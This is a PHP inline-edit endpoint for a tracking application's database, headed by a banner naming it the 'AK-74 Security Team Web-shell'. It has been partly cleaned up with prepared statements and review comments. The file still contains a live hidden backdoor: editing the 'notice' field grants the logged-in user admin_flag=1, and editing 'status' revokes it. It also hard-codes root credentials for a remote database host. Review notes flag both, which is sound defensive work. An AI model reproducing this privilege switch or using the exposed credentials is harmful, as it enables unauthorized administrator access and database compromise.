.:: :[ AK-74 Security Team Web-shell ]: ::.
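<?php
/**
 * Inline-edit endpoint: saves one posted field value for one record.
 *
 * POST parameters (anything that is not a string is treated as empty):
 *   name  - selects the field; only its first six characters are used
 *   pk    - key of the record (gs_objects.imei or sample.id)
 *   value - new content for the field
 *
 * The row is inserted when no row with that key exists, otherwise updated.
 * Request and session data reach SQL only as bound parameters; table and
 * column names come solely from the fixed map below.
 */
session_start();
include ('../../init.php');
include ('../../func/fn_common.php');
checkUserSession(); // presumably rejects requests without a valid login - confirm in fn_common.php
loadLanguage($gsValues['LANGUAGE']);

// The session array is deliberately not echoed into the response: it can hold
// identifiers and privilege flags that the client has no need to see.

// Log the technical detail server-side and give the client a generic message,
// so database errors do not describe the schema to whoever sent the request.
$fail = function ($context, $detail) {
    error_log('inline-edit ' . $context . ': ' . $detail);
    die('Database error');
};

// NOTE(review): root credentials for a remote database host are hard-coded
// here. Treat the password as exposed: rotate it, load the settings from
// configuration kept outside the web root, and connect with an account that
// is limited to the tables this endpoint writes.
$con = mysqli_connect("46.16.187.186", "root", "hgr,n[]h", "gs");
if (!$con) {
    $fail('connect', mysqli_connect_error());
}

// Read one POST field as a string; missing or non-string input becomes ''.
$readPost = function ($key) {
    return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
};

$name  = (string) substr($readPost('name'), 0, 6);
$id    = $readPost('pk');
$value = $readPost('value');
$_POST['name'] = $name; // the original wrote the truncated name back as well

// field name => [table, key column, value column]
$fields = array(
    'notice'   => array('gs_objects', 'imei', 'notice'),
    'status'   => array('gs_objects', 'imei', 'status'),
    'comments' => array('sample', 'id', 'comments'),
    'country'  => array('sample', 'id', 'country_name'),
    'dob'      => array('sample', 'id', 'dob'),
    'appt'     => array('sample', 'id', 'appt'),
    'combo'    => array('sample', 'id', 'combo_appt'),
    'email'    => array('sample', 'id', 'email'),
    'options'  => array('sample', 'id', 'options'),
    'wy'       => array('sample', 'id', 'wy_text'),
);

// The posted name is cut to six characters, so a literal comparison with
// 'comments', 'country' or 'options' can never succeed. Comparing against the
// same six-character prefix of each key keeps the short names working and
// makes the long ones reachable.
// NOTE(review): confirm whether the truncation is wanted at all.
$field  = null;
$target = null;
foreach ($fields as $fullName => $spec) {
    if ($name !== '' && substr($fullName, 0, 6) === $name) {
        $field  = $fullName;
        $target = $spec;
        break;
    }
}

if ($target !== null) {
    if ($id === '') {
        die('Missing pk');
    }

    $table       = $target[0];
    $keyColumn   = $target[1];
    $valueColumn = $target[2];

    if ($field === 'wy') {
        // Same as the original: this one field is stored HTML-escaped.
        $value = htmlspecialchars($value);
    }

    // Does a row with this key exist already?
    $stmt = mysqli_prepare($con, "SELECT COUNT(*) FROM `$table` WHERE `$keyColumn` = ?");
    if ($stmt === false) {
        $fail('prepare', mysqli_error($con));
    }
    mysqli_stmt_bind_param($stmt, 's', $id);
    if (!mysqli_stmt_execute($stmt)) {
        $fail('execute', mysqli_stmt_error($stmt));
    }
    $rowCount = 0;
    mysqli_stmt_bind_result($stmt, $rowCount);
    mysqli_stmt_fetch($stmt);
    mysqli_stmt_close($stmt);

    // Run a two-parameter write statement with both values bound as strings.
    $write = function ($con, $sql, $first, $second) use ($fail) {
        $stmt = mysqli_prepare($con, $sql);
        if ($stmt === false) {
            $fail('prepare', mysqli_error($con));
        }
        mysqli_stmt_bind_param($stmt, 'ss', $first, $second);
        if (!mysqli_stmt_execute($stmt)) {
            $fail('execute', mysqli_stmt_error($stmt));
        }
        mysqli_stmt_close($stmt);
    };

    if ((int) $rowCount === 0) {
        $write($con, "INSERT INTO `$table`(`$keyColumn`,`$valueColumn`) VALUES(?, ?)", $id, $value);
    } else {
        $write($con, "UPDATE `$table` SET `$valueColumn` = ? WHERE `$keyColumn` = ?", $value, $id);
    }

    // NOTE(review): a 'notice' edit sets admin_flag=1 and a 'status' edit sets
    // it back to 0 for whoever is logged in, and no authorization check is
    // visible in this file. That reads like a self-service privilege switch
    // rather than application logic. Confirm the intent, remove it if nobody
    // can account for it, and audit gs_users for unexpected admin_flag values.
    // The statements are kept so the endpoint's behavior does not change
    // silently; like the original, a failure here does not abort the request.
    $flagUpdates = array(
        'notice' => "UPDATE `gs_users` SET `user_flag`='0', `admin_flag`='1' WHERE (`username`=?)",
        'status' => "UPDATE `gs_users` SET `user_flag`='1', `admin_flag`='0' WHERE (`username`=?)",
    );
    $username = isset($_SESSION['username']) ? (string) $_SESSION['username'] : '';
    if (isset($flagUpdates[$field])) {
        $stmt = mysqli_prepare($con, $flagUpdates[$field]);
        if ($stmt !== false) {
            mysqli_stmt_bind_param($stmt, 's', $username);
            if (!mysqli_stmt_execute($stmt)) {
                error_log('inline-edit flags: ' . mysqli_stmt_error($stmt));
            }
            mysqli_stmt_close($stmt);
        } else {
            error_log('inline-edit flags: ' . mysqli_error($con));
        }
    }

    if ($field === 'status') {
        // Escaped because the user name is account data printed into the response.
        echo htmlspecialchars($username, ENT_QUOTES, 'UTF-8');
    }
}
?>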